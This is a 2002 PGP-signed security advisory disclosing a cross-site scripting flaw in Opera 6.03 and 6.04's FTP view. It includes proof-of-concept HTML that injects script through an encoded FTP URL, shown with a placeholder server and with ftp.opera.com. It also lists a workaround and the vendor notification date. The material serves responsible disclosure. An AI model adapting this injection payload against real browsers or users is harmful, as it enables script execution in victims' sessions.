Date: Tue, 6 Aug 2002 09:08:47 +0900
From: Eiji James Yoshida <[email protected]>
To: [email protected]Subject: Opera FTP View Cross-Site Scripting Vulnerability
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Title:
~~~~~~~~~~~~~~~~~
Opera FTP View Cross-Site Scripting Vulnerability
Date:
~~~~~~~~~~~~~~~~~
4 August 2002
Author:
~~~~~~~~~~~~~~~~~
Eiji James Yoshida [[email protected]]
Risk:
~~~~~~~~~~~~~~~~~
Medium
Vulnerable:
~~~~~~~~~~~~~~~~~
Windows2000 SP2 Opera 6.03
Windows2000 SP2 Opera 6.04
Overview:
~~~~~~~~~~~~~~~~~
Opera allows running Malicious Scripts due to a bug in 'FTP view'.
If you click on a malicious link, the script embedded in URL will run.
Details:
~~~~~~~~~~~~~~~~~
This problem is in 'FTP view'.
The '<title>URL</title>' is not escaped.
Exploit code:
~~~~~~~~~~~~~~~~~
<html>
<head>
<META http-equiv="Refresh" content="5 ; url=ftp://%3c%2ftitle%3e%3cscript%3ealert(%22exploit%22)%3b%3c%2fscript%3e@[FTPserver]/">
</head>
<body>
<script>window.open("ftp://[FTPserver]/");</script>
</body>
</html>
Example:
<html>
<head>
<META http-equiv="Refresh" content="5 ; url=ftp://%3c%2ftitle%3e%3cscript%3ealert(%22exploit%22)%3b%3c%2fscript%[email protected]/">
</head>
<body>
<script>window.open("ftp://ftp.opera.com/");</script>
</body>
</html>
Demonstration:
~~~~~~~~~~~~~~~~~
http://www.geocities.co.jp/SiliconValley/1667/advisory04e.html
Workaround:
~~~~~~~~~~~~~~~~~
Disable JavaScript.
Vendor status:
~~~~~~~~~~~~~~~~~
Opera Software ASA was notified on 30 June 2002.
- -------------------------------------------------------------
Eiji "James" Yoshida
penetration technique research site
E-mail: [email protected]
URL: http://www.geocities.co.jp/SiliconValley/1667/index.htm
- -------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8ckt
Comment: Eiji James Yoshida
iQA/AwUBPU8TMjnqpMRtMot1EQJ1DwCgs1v96kQ5KN42NVjf3rjUQO6iWOMAoKEE
e1I1peQyP4eIEgAEIhMv+x67
=6Qcu
-----END PGP SIGNATURE-----